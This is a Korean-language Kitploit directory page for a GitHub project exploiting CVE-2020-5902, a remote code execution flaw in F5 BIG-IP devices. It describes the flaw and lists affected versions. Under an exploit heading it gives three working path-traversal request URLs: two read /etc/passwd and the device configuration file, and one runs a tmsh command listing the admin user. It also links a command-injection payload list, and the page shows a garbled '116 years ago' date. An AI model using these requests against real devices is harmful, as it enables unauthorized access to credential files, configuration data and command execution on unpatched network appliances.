Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
RCE-CVE-2020-5902 — BIG-IP F5 원격 코드 실행 | Kitploit
도구/GitHubGitHub/jsec1337/rce-cve-2020-5902
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubjsec1337/rce-cve-2020-5902

RCE-CVE-2020-5902

BIG-IP F5 원격 코드 실행

저장소 보기
116년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

RCE-CVE-2020-5902

BIG-IP F5 원격 코드 실행

설명

이 공격들은 F5 Networks에서 제조한 다목적 네트워킹 장치인 BIG-IP를 대상으로 합니다. BIG-IP 장치는 트래픽 셰이핑 시스템, 로드 밸런서, 방화벽, 액세스 게이트웨이, 속도 제한기 또는 SSL 미들웨어로 작동하도록 구성할 수 있습니다.

수요일, F5 Networks는 BIG-IP 장치의 "원격 코드 실행" 취약점에 대한 보안 권고를 발표하고 패치를 공개했습니다.

F5는 CVE-2020-5902로 추적되는 이 취약점으로 인해 공격자가 인터넷에 노출된 패치되지 않은 시스템을 완전히 제어할 수 있다고 밝혔습니다.

root@kitploit:~
Version BIG-IP Vulnerable : 15.0.0-15.1.0.3, 14.*.*, 13.*.*, 12.*.*, 11.*.*
Vulnerability             : Remote Code Execution (RCE) 
Score CVE                 : 10/10

익스플로잇

root@kitploit:~
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
root@kitploit:~
https://BIG-IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

NMAP 확인

RCE 페이로드

https://github.com/payloadbox/command-injection-payload-list

참조

https://twitter.com/Nep_1337_1998/status/1279610946864820225

https://www.zdnet.com/article/hackers-are-trying-to-steal-admin-passwords-from-f5-big-ip-devices/

도구 다운로드